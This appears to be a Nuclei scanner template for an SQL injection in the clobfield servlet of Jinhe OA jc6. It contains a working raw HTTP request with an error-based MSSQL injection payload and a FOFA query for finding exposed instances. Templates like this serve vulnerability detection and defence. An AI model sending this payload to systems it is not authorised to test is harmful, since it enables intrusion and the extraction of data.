41 lines
1.4 KiB
YAML
41 lines
1.4 KiB
YAML
id: jinhe-jc6-sqli
|
|
|
|
info:
|
|
name: Jinhe OA - SQL Injection
|
|
author: Ky9oss
|
|
severity: high
|
|
description: |
|
|
SQL injection vulnerability in the ljc6/servlet/clobfield interface of Jinhe OA jc6. An attacker can obtain sensitive information.
|
|
reference:
|
|
- https://github.com/wy876/POC/blob/main/%E9%87%91%E5%92%8COA%20jc6%20clobfield%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
|
|
- https://blog.csdn.net/qq_41904294/article/details/135074649
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: title="金和协同管理平台"
|
|
tags: jinher,jc6,sqli
|
|
variables:
|
|
num: "{{rand_int(9000000, 9999999)}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /jc6/servlet/clobfield HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
key=readClob&sImgname=filename&sTablename=FC_ATTACH&sKeyname=djbh&sKeyvalue=11' and CONVERT(int,(select%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27{{num}}%27))))=1 and ''='
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "{{md5(num)}}"
|
|
- "nvarchar"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100c19147d2bce1f7fbc8803bd71443601210540be4882d7d84c1a7d9942a3b9ada02201c43df219a8cc0e6aff5b0e42357ac00edf763ee97a4d068e60c16f9d08ac5cf:922c64590222798bb761d5b6d8e72950 |